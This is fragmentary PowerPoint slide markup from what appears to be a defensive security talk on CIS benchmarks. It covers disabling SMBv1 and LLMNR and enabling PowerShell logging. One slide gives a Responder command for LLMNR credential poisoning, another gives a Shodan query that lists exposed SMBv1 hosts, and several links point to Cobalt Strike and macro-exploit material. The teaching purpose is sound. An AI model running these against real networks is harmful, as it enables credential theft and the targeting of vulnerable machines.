      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207048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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, from the bottom we have High level actions prioritized.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Benchmarks as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> detailed guides.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CIS-CATS, which automates assessment of benchmark.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CIS-CATS installation: https://screencast-o-matic.com/watch/cFj6F7qjgf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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321000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Follow our prioritized set of actions to protect your organization and data from known cyber attack vectors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Intention is to prioritize and plan for protecting data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Let’s briefly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0"/>
              <a:t> talk about #5 Secure Configurations for hardware and Software on Workstations/Servers via Benchmarks (guidelines to protect systems).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0"/>
              <a:t>Let’s also talk about #9 Limit and control network ports, protocols and Services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3105628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it says SMBv1 to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why should you care?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These still need adjusting… Look to other resources.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3504090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www.shodan.io/" TargetMode="External"/><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shodan.io/search?query=port:445+%22SMB+Version:+1%22+os:Windows+!product:Samba" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malwareless.com/wannacry-ransomware-massively-attacks-computer-systems-worl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youtube.com/watch?v=rjRDsXp_MNk&amp;t=627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creencast-o-matic.com/u/vqZ/CIS-CA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cobaltstrike.com/downloads/csmanual311.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www.cobaltstrike.com/downloads/csmanual311.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information.rapid7.com/dynamic-payloads-for-av-evasion.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youtube.com/watch?reload=9&amp;v=1LZCb4HJlkI"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vysec/RedTip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Jessefmoore+DFIR@gmail.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/in/jessefmoore/"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creencast-o-matic.com/u/vqZ/BuildMacroExploitEmpir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hyperlink" Target="https://screencast-o-matic.com/u/vqZ/Find_FilelessMa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cisecurity.org/cybersecurity-best-practices/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberwardog.blogspot.com/2017/07/how-hot-is-your-hunt-team.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github.com/clong/DetectionLab" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/atomic-red-team/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/ATT&amp;CK_Matrix"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blog.jpcert.or.jp/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.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countercept/memory-carving-scripts"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screencast-o-matic.com/u/vqZ/CrackHashResponder" TargetMode="External"/><Relationship Id="rId7"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hyperlink" Target="https://screencast-o-matic.com/u/vqZ/PTH-Detection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpir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1756" y="1179824"/>
            <a:ext cx="8228403" cy="2641756"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Malware, Config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mgmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; Logs Oh My!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89E4B962-4716-45E9-A2C0-9577B2FE40F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="441789" y="1358693"/>
            <a:ext cx="8030455" cy="2476846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA918B18-F27C-422C-9B43-D22AED1F4227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671756" y="6267368"/>
            <a:ext cx="2638793" cy="590632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1913477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High Level Concepts to protect org data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-305715" y="428"/>
            <a:ext cx="9755429" cy="6857143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71945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4FBDC2-714D-4DBB-BE78-44720C86334B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C87E98F-A20A-4257-9A99-248B4C4FC0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Benchmark: Disable Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMBv1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="1363509"/>
            <a:ext cx="6363588" cy="4976331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994848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1757" y="365069"/>
            <a:ext cx="3051762" cy="998440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Baselines still need adjusting.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="940777" y="6471138"/>
            <a:ext cx="5380892" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Reference: https://medium.com/@rootsecdev/an-in-depth-look-at-server-2019-and-windows-10-rs5-security-baselines-52508a986c16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="717082" y="2493630"/>
            <a:ext cx="2914141" cy="3889585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3723519" y="365069"/>
            <a:ext cx="5420481" cy="6018145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3464687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4FBDC2-714D-4DBB-BE78-44720C86334B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C87E98F-A20A-4257-9A99-248B4C4FC0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> infection via SMBv1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79131" y="4678764"/>
            <a:ext cx="4248359" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.shodan.io/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://malwareless.com/wannacry-ransomware-massively-attacks-computer-systems-world/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.shodan.io/search?query=port%3A445+%22SMB+Version%3A+1%22+os%3AWindows+%21product%3ASamba</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1730667"/>
            <a:ext cx="4505325" cy="2381250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4327490" y="1730667"/>
            <a:ext cx="4620270" cy="4685244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4090853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71756" y="1613128"/>
            <a:ext cx="8366735" cy="250842"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>CIS_Microsoft_Windows_10_Enterprise_Release_1607_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>_v1.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="748567" y="1963198"/>
            <a:ext cx="5995134" cy="4377678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748567" y="6431312"/>
            <a:ext cx="5573102" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: https://medium.com/@rootsecdev/an-in-depth-look-at-server-2019-and-windows-10-rs5-security-baselines-52508a986c16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="455026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0717" y="4225282"/>
            <a:ext cx="8754697" cy="2162477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LLMNR Attack (10:36 minutes into it)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=rjRDsXp_MNk&amp;t=627s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python Responder.py –I eth0 and wait for the user to request the wrong web address, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fileshare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Responder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LLMNR Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2909854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4FBDC2-714D-4DBB-BE78-44720C86334B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adjust…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C87E98F-A20A-4257-9A99-248B4C4FC0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShell Script block logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3566013" y="1363509"/>
            <a:ext cx="5353050" cy="5035072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
